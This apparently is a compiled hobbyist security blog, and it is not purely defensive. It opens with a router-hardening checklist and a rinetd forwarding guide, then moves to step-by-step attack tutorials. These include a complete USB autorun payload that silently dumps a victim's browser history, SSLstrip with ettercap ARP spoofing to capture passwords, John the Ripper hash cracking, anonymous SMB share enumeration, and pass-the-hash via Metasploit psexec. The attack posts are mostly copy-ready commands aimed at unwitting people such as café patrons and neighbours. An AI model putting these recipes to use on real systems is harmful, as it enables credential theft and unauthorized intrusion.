http://www.forensicswiki.org/wiki/Tcpxtract

10 Steps to securing a wirless router, by synjunkie

I got this from another blog and i find the information very help and comprehensive. It does teach you or show you how to configure your routers but tells you the things that you should know and check for when setting up your own wireless router. Therefore, you can use this as your checklist, if you will to not getting pwned but your inquisitive neighbours.

The following was taken from synjunkies blog:
http://synjunkie.blogspot.com/2009/02/10-steps-to-securing-wireless-router.html

1. Upgrade Firmware

It's always a good idea to keep firmware as up to date as possible as the vendor may have fixed known vulnerabilities or bugs since the hardware shipped. As a bonus you might even get a bit more functionality thrown in as well with the firmware upgrade. Its also a god idea to check the vendors site every couple of months for updates.


2. Change the default Password

Obviously!


3. Turn off Wireless Administration

This will prevent anyone who is not physically plugged into the network from administering the wireless router.


4. Enable Encryption

Enable the best encryption possible. WPA2 is preferred but if the connecting devices only support WEP then WEP it is. Just be aware that WEP is crap and it can b e cracked in seconds. Ensure that whatever encryption you use it has a long random key. There are plenty of random key generators available so use them.


5. Change & Hide the Default SSID

Don't leave your default SSID as Linksys or Belkin. Change it to something unique but not something that identifies it as your network, such as “Bob Scratchets House”. Even after hiding the SSID it is possible for an attacker to view it but it is another layer in your defense strategy.


6. Apply MAC Address Filtering

Each device that has a wireless card in will have a MAC address. Apply MAC address filtering so only devices with the specified MAC addresses can connect using wireless to you router. This can be bypassed but it's another hurdle to make a potential attacker jump through.


7. Disable UPnP

Universal Plug and Play is a method by which software can open up ports on the router to allow external hosts to communicate through the router with a host on the LAN. This can also be used by malware to open up the router to allow a route in. by disabling UPnP you will need to enable port forwarding when required.


8. Configure the DHCP Settings

If your router allows you to change your DHCP scope you may want to set it to hand out addresses from a range other than the default, such as the 172.16.x.x range. Also by limiting the amount of addresses to the number of hosts you have it might provide an early warning system if someone does manage to bypass your security and hop onto your wireless LAN.


9. Configure DNS Settings

Point your DNS to a provider such as OpenDNS and utilise there free services. OpenDNS can be used to block specific types of sites such as File Sharing or Pornography and also to log where computers from your LAN are going to. It will also block your computer from visiting known bad sites. Another important note, when the DNS flaw was released to the public by Dan Kaminsky at Blackhat 08, Open DNS was one of the first DNS providers to provide protection. At the time of this post many ISPs are still vulnerable.


10. Enable Logging

If your router allows you to enable logging it is worthwhile doing so. By familiarising yourself with the logs regularly you will get to recognise what is normal and what is not. But remember, logs are only useful if you check them!

The functions I have raised in these 10 steps are those that should be available on most consumer grade routers. If you have a router that does have more functionality such as allowing you to use HTTPS to access the administrative interface then that's great, use it.

Get familiar with what your router can do and know where to look to check settings such as port forwarding. And once you have set up the router and gotten it working well, save the config and store it somewhere safe and secure such as in a Truecrypt volume or in an encrypted disk image.

::
==================================================
::

Very interesting and informative checklist. The closing sentences does add some complexity with storing config files on truecrypt volumes or encrypted disk images. Although its a good practice (and most likely madatory)for high security environments, the acerage user doesnt and most likely wouldnt be too concerned about backup up his config files in secure locations. They probly know what encryption is but dont know how to use it to their own benifit and probly wouldn't worry about the hasstle to learn. But those that might be interested in learning about encrypting their data, im gonna do a post of Truecrypt in the near futer, showing you how you can encrypt your data/router configs in an ecrypted volume.

Resources/Good reading:
http://synjunkie.blogspot.com/2009/02/10-steps-to-securing-wireless-router.html

Rinetd, redirector

This program seems to be loosing some of its buzz but still noteworthy in my opinion. Its not complex program to use or learn. Its main role/function is to redirect TCP connections from one IP address and port to another. It is able to handle any number of connections to address/port pairs specified in its config file, located at /etc/rinetd.conf. Rinetd does not redirect ftp because FTP requires more than one socket.

Typical Forwarding rule in rinetd.conf:
[Syntax]
bindaddress bindport connectaddress connectport

For example:

201.21.21.21 80 10.0.0.2 80

Would redirect all connections to port 80 of the Public IP address 201.21.21.21 to port 80 of the address 10.0.0.2, which would typically be an mahine on the inside of a firewall which has no direct routing to the outside world. This method only responds on the indivual interface connected to the outside(ethernet card connected to the modem). If this server has multiple interfaces, sometimes its preferable to respond on all of them.

0.0.0.0 80 10.0.0.2 80

Would redirect all connections to port 80 for all ip addresses assigned to the server

You can also allow and deny specific clients or clients in a subnet from using the redirector. The '?' wildcard can be used to match any one character while '*' wildcard can match any number of characters, including zero.

allow 201.21.21.21 // allow one specifc addres
allow 201.21.21.11? // allow range of address matchin 201.21.21.110-119
allow 201.21.21.* // allow IP addresses for class C domain, 201.21.21.0 -255

After you have customized your config file, to run the server run:

# rinetd

If you have a few custom config files you can specify which one to use.

# rinetd -c /etc/my_custom_config.conf

It might be useful to have logs and by default rined doesn't produce any. To activate logging, add the following line to the configuration file:

logfile logfile_location

example:

logfile /var/log/rinetd.log

By default, rinetd logs in a simple tab-delimited format containing the following information:
Date and time
Client address
Listening host
Listening port
Forwarded-to host
Forwarded-to port
Bytes received from client
Bytes sent to client
Result message

Thursday, November 26, 2009

USB Hack

There are many usb hacks currently on the web, each with unique abilities and purposes. The idea behind the hack is to make use of the autorun feature that most systems employ. This means that when you plug in your USB stick (those capable of thbe autorun feature, see U3 supported drives), it can autorun a program or script. This means that you can be at a coffee shop and you can turn around to by some coffee and leave your comp unattended for a1 min and in that space of time, a malicious user can plug his thumbdrive in you system for 5 seconds and aquire valuable information, such as passwords and browser history. Thats it, 5 seconds and you get pwned.

This project is mostly used on the customizable U3 drives but can be made to work with regular thumb drives with a difference. Its not fully automatic. When u pluggin the drive, you should be prompted with a screen in which with a click of the 'Open' button, you can make your script or executable run. For our demo, we would be using a regular thumb drive to simulate the attack. We are gonna use windows for this.

Files you would need:
[nircmd.exe] : http://www.nirsoft.net/utils/nircmd.zip
[iepv.exe] : http://www.nirsoft.net/utils/iehv.zip
[drive.ico]: Just an icon that i used. Use any icon and rename to drive.ico

Open up notepad and type the following. Save the file as Autorun.inf:

[AutoRun]
OPEN="nircmd.exe execmd iepv.exe /stext ievh.txt"
ICON=drive.ico
ACTION=Start my application

Copy iepv.exe, nircmd.exe, drive.ico and Autorun.inf to a newly formatted thumb drive. Voila, you are finished. The Autorun.inf would cause a prompt to appear when you plug your thumb drive in a windows system. Nircmd.exe is a useful multi-purpose commandline utility that we used to stealthily execute iepv.exe (to hide the command prompt that may popup anytime u execute a command line based tool). Iepv.exe is a small utility that does one thing well, dump Internet Explorer's history contents.

To execute the attack (if u havent figured the rest out already), all you do is plug the usb drive into a windows system. A autorun popup appears asking you to open the drive. All you do from here onwards is click open then the iepv.exe would execute its job in the background. Within 5 seconds you should be able to unplug the drive and take it away with you. When you open your drive their would be a text file, iehv.txt stored to the thumb drive with a listing of the browsing history of your target. This method can be extended by the use of scripts and other executeables. i'd leave some examples of this stuff in the resources section.

Resourses/Good reading:
http://www.nirsoft.net
http://www.usbhacks.com/
http://wiki.hak5.org/wiki/USB_Switchblade
http://portableapps.com/node/5221

Attack on SSL with SSLstrip

There is alot of controvery around this tool, mainly its major ability to put a large some of noobs at your ankles. Yes, this tool is some serious business. I was reading the author's (Moxie Marlinspike) webpage of sslstrip and read that the research that he published got his account with paypal suspended. He presented his work in one of the worlds famous hacker conferences, Black hat 2009, and posted some statistics of the over 500 users he was able to steal credentials from, including passwords, credit card numbers, etc. The most important highlight of these stats was that 0 of these users knew of their pwnge. It was completly transparent to them.

SSLStrip-0.6:
This tool doesnt perform a generic man in the middle for of attack on ssl like tools such as ettercap or cain and able does. These tools rely on the stupidiy of users to accept a fake certificate on their web browser which most of them still do. With SSLstrip, the wow factor of the whole concept is that 98% of the attack is transparent to the average user. According to the author, "sslstrip will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects them, then map those links into either look-alike HTTP links or homograph-similar HTTPS links". In version 0.5, a neat feature was added where it It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial.


There is a decent explanation on how it works on the authors website that im gonna mostly mimic, with minor changes for better elaboration.

Requirements

  • Python >= 2.4 (apt-get install python)
  • The python "twisted-web" module (apt-get install twisted-web)
Or if you have backtrack 4 like i do, then you don't need to worry about the above.

Setup

  • # tar zxvf sslstrip-0.5.tar.gz //extrack the contents from compressed archive
  • # cd sslstrip-0.5
  • (Optional)# sudo python ./setup.py install //It Installs to appropriate directories. Not a necessity, can already run out the box.

Running sslstrip

  • Flip your machine into forwarding mode. (# echo "1" > /proc/sys/net/ipv4/ip_forward)
  • Setup iptables to redirect HTTP traffic to sslstrip. (# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port )
  • Run ettercap to perform an arpspoof attack and also sniff out passwords on the fly and display them in real time. (# ettercap -Tq -i eth0 -M ARP:remote /10.0.0.2/ /10.00.1/)
  • Run sslstrip. (# sslstrip.py -l )

That all to the magic. To test this, goto a website like facebook and logon with some credentials(correct or incorrect) and just after you do so, take a look at ettercap's interface. Did you notice anything confidential about yourself that facebook and no one else should be allowed to know. AHHH.

Here's a nice video by John Strand demonstrating this attack:

SSLStrip from John Strand on Vimeo.


Resources/Good reading:
http://www.thoughtcrime.org/software/sslstrip/
http://www.vimeo.com/3970303

Cracking passwords with John the Ripper

John the ripper is a free, fast and portable password cracker. It currently runs on over 10 platforms including linux/Unix, Dos and Windows. It can be run against various encrypted password formats: Unix flavors (based on DES, MD5, or Blowfish), Kerberos AFS, and Windows NT/2000/XP/2003 LM hash.

Attack types: Dictionary and Brute force

Taken from wikipdea: http://en.wikipedia.org/wiki/John_the_Ripper

One of the modes John can use is the dictionary attack. It takes text string samples (usually from a file, called a wordlist, containing words found in a dictionary), encrypting it in the same format as the password being examined (including both the encryption algorithm and key), and comparing the output to the encrypted string. It can also perform a variety of alterations to the dictionary words and try these. Many of these alterations are also used in John's single attack mode, which modifies an associated plaintext (such as a username with an encrypted password) and checks the variations against the encrypted hashes.

John also offers a brute force mode. In this type of attack, the program goes through all the possible plaintexts, hashing each one and comparing it to the input hash. John uses character frequency tables to try plaintexts containing more frequently-used characters first. This method is useful for cracking passwords which do not appear in dictionary wordlists, but it does take a long time to run.

This demo assumes you have acquired the hashes from a windows system (hashes.txt in this example) and a wordlist (readily available on the web, use google):

# ./john --wordlist=mywordlist.txt hashes.txt
Loaded 2 password hashes with no different salts (LM DES [128/128 BS SSE2])
(Guest)
MYPASS (admin)
guesses:2 time: 0:00:00:00 100% c/s 1298k trying: ANOS - ANYONE

As you can see the guest account has a blank password, while the admin account has a password of 'mypass'. John computer these hashes in less than a second with my chosen wordlist. Remember, you may only crack the password only if its in the wordlist. Take your time in choosing a good wordlist and make necessary changes to them based on your initial profiling of a potential target.

UPDATE:
When using hashes like MD5 or SHA1 for John to read those hash files correctly they need to follow the format of "user:hash". You cannot just have the hash by itself in a text file.

eg:
# echo -n "mypass" | openssl dgst -md5 > hash.txt

the above outputs the hash but john does not just read the hash by itself. You can edit the hash.txt text file and add a username followed by a colon (:) , then followed by the hash. John will then be able to input the hash file and attempt to crack it.

You can also create wordlists and expand a wordlist with johns word mangling rules

# ./john --wordlist=mylist.txt --rules --stdout

Resources/Good reading:
http://en.wikipedia.org/wiki/John_the_Ripper


Playing with netbios shares (smbclient and nmblookup)

So you are on a network and wanna learn info about your neighbours, whats their computer name is, who is logged on share names etc. Windows make most of this information easy for us to obtain. Enter the smbclient, an ftp-like client to access smb/cifs resources and nmblookup is a utilty that is used to lookup Netbios names. Before we begin our enumeration of the network we need to determine the IP's of the live windows clients.

# netdiscover -i eth0 -r 10.0.0.2/24 //Discover live clients that respond to our arp requests

I personally would use nmap for this as it has many other scan techniques than just the arp method. After we identify oue potential target (we are gonna use 10.0.0.2) lets use them in smbclient and nmblookup.

#nmblookup -A 10.0.0.2 //resolve 10.0.0.2 netbios name. The hex code in the second column means something to us. If you get <03> the corresponding text to the left of '<03>' would be the currently logged in user. Below is a list taken from , http://www.windowsnetworking.com/kbase/WindowsTips/WindowsNT/AdminTips/Utilities/Nbtstatrevealswhoisloggedon.html, that list some of the meanings behind the hex code.

Name                Number(h)  Type  Usage
--------------------------------------------------------------------------
00 U Workstation Service
01 U Messenger Service
<\\--__MSBROWSE__>
01 G Master Browser
03 U Messenger Service
06 U RAS Server Service
1F U NetDDE Service
20 U File Server Service
21 U RAS Client Service
22 U Microsoft Exchange Interchange(MSMail
Connector)

23 U Microsoft Exchange Store
24 U Microsoft Exchange Directory
30 U Modem Sharing Server Service
31 U Modem Sharing Client Service
43 U SMS Clients Remote Control
44 U SMS Administrators Remote Control
Tool

45 U SMS Clients Remote Chat
46 U SMS Clients Remote Transfer
4C U DEC Pathworks TCPIP service on
Windows NT

42 U mccaffee anti-virus
52 U DEC Pathworks TCPIP service on
Windows NT

87 U Microsoft Exchange MTA
6A U Microsoft Exchange IMC
BE U Network Monitor Agent
BF U Network Monitor Application
03 U Messenger Service
00 G Domain Name
1B U Domain Master Browser
1C G Domain Controllers
1D U Master Browser
1E G Browser Service Elections
1C G IIS
00 U IIS
2B U Lotus Notes Server Service
IRISMULTICAST
2F G Lotus Notes
IRISNAMESERVER
33 G Lotus Notes
Forte_$ND800ZA
20 U DCA IrmaLan Gateway Server Service
Next we can use smbclient to reveal the shares on a particular system.

# smbclient -N -L 10.0.0.2 //List share names and OS type

-N: Surpases the password prompt, assuming we dont of any passwords
-L: list shares and any other available service it can see.

We can attempt to connect/login to a system share.

# smbclient //10.0.0.2/share -N // try and connect to 'share' on 10.0.0.2

If you are lucky and manage to get into the share, its as of a result of poorly implemented shares. Yon can browse the directory, upload/download files and some other goodness. Type help for a list of commands at your disposal.

# smb> help

Its more difficult to set up a proper share on XP with the appropriate permissions than to set up
a share thats open to everyone. Sounds like the mindset of the typical windows user aint it. I'll admit, i was one of em.

Resources/Good reading:
http://pur3h4t3.blogspot.com/2008/12/scripts.html
http://www.windowsnetworking.com/kbase/WindowsTips/WindowsNT/AdminTips/Utilities/Nbtstatrevealswhoisloggedon.html

Pass-the-Hash, Who needs a password anyways...

Pass the hash refers to a method in which a user can authenticate with a system without using the plain-text password. What is used instead is what is known as the encrypted hash (your plain-text password is ran through a one way process or algorithm and the result is known as a password hash). In the passing the hash method, we would be using this hash to authenticate with the server. We can't just type in the hash into the password prompt and get it work if thats what you're assuming. We are gonna require some special tools to do the job for us as this method is not naturally supported by windows for obvious reasons. The tools im gonna demo is a modified version of smbclient, called smbclient.py written in python and found in Bactrack 4 and a metasploit module, psexec. This demo requires you to use your skills to obtain a these hashes(reasearch fgdump or pwdump).

[SMBCLIENT]
Enter the following commands for smbclient:
# python ./smbclient.py //Start the client
# open 10.0.0.2 139 //opens a SMB connection against host/port
# login_hash user1 your_lmhash your_nthash //logs into the smb session with user/hash combo. Note the space between both lm and the nt hash.
example: login_hash mary AAFF5441321GSGW566WT ERGBXHG4J65461DF564DHD
# Shares //list available shares
# use share_name //connects to a specific share

If all goes well and you are logged in, you can go up the file tree, download or upload files, delete files etc. For more commands just type 'help'.

[PSEXEC]
Enter the following commands for smbclient:
# ./msfconsole //Lauch the metasploit framework
msf> use exploit/windows/smb/psexec //select the psexec module to use as the exploit
msf exploit(psexec)>show options //list the options that are needed for the exploit to work
msf exploit(psexec)>set RHOST 10.0.0.2 //sets the targets IP
msf exploit(psexec)>set SMBUser admin //sets the username
msf exploit(psexec)>set SMBPass lm_hash:nt_hash //Sets the lm:nt hashes. Note that you need both seperated only by a ':'. Leave the rport at 445(139 wont work).
msf exploit(psexec)>set PAYLOAD windows/exec //sets your payload. Do show payloads for others
msf exploit(psexec)>set CMD calc.exe //sets the command to execute
msf exploit(psexec)>exploit //run the exploit

If all is well, calc.exe should have been executed on the remote system. Obviously you may want too do something more than just run calc like gain a shell. No problem, just set the required payload and the necessary options and you're good to go.